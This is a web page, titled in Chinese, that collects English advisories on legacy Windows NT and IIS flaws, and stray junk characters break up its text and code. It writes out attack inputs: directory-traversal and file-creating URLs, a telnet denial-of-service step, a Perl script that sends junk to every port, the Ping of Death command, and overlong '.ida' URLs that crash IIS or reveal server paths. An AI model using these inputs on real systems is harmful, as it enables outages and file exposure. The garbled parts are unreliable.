NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
. f* n6 W9 }$ ^
/ [. s6 ?$ R  xA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
, Q: X2 n' E! _$ Z! j$ |& `/ G
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
: M/ d8 v8 P7 L) l
7 j9 Q9 P% D9 o" I--------------------------------------------------------------------

受影响系统:4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

4 b! D* `3 [% \+ N. \% F' [! mIf the file 'target.bat' exists, the file will be truncated.
9 A/ x+ B& W/ R% h- E4 C
+ J; n7 B1 w# ^, Y( F+ [( o
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------

' n" W' ^' }/ i' T% [" H4 L受影响系统:3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
* x2 [; k0 X1 k
# Z' T0 s7 j' q1 y5 LThe following steps;
. h; C& D8 U  y" E
& V  J, K+ x, {8 iTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
; |4 q& |9 q4 b/ Y+ xExit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
9 A2 z7 e8 p: Y
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

: C. b# D' p  r) T1 V1 KThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
4 C/ M/ E# y' N. H6 U4 X. {2 j
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/
3 a$ ^% j$ ]( S5 |) z$ E- D" F# o
use Socket;
) ]# ?7 L7 f! A3 T  Tuse FileHandle;
require "chat2.pl";

; R. C) Z- U4 ^# Z! U& V$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{
! S! Y& ^" [0 [: m

if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($systemname, $port);
7 O( a/ n2 e' \5 F  Pchat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
9 i8 W5 E6 J4 E8 _}
  I8 g; {. F# I" h* t% j: Qchat::close($fh);
, K( R# J2 j- {
$ s( q7 D/ h. \: i: B}

; L% l. s. [, {' m# k, _
/*end poke code*/

! X$ N0 V! J% w0 V* [0 W9 dSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
, Z* B8 t$ L2 A8 _
--------------------------------------------------------------------------------

9 k3 y& L) Q/ Z1 ]6 m受影响系统:4.0
4 b2 g' y  f& i4 e0 K* R& CUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
/ y) _1 V; [; D+ O0 U
This attack causes Dr. Watson to display an alert window and to log an error:

2 A1 N3 m3 p2 |% E3 m' _5 ["The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
: G5 Q2 D6 H: y, U- z" q- G9 A
  w( p0 I1 B0 Z" p% @, m受影响系统:3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
; k+ G3 J# N/ W# Q& GKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
! O) e# k* D7 j/ J2 b7 l
-OR-
$ s0 \. g! f# K' Z; q* H7 P! F
- j. S8 {) I2 t' ]# `' `0 CSTOP: 0x0000000A
* q" B. |4 T! wIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
1 M3 o, P( t7 T' \1 }
" M2 f- d% k5 z4 |6 GNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
0 |  r# V; P# K% w" h
8 Z( `+ x( S3 ?. d) E--------------------------------------------------------------------------------

) H  S7 k" t) F! k( o1 f2 b/ \Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
! d5 u4 r; j3 ]
& ]8 B1 B7 v$ m( }) @' \2 U, v1 S--------------------------------------------------------
5 J3 h4 o: X; \
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server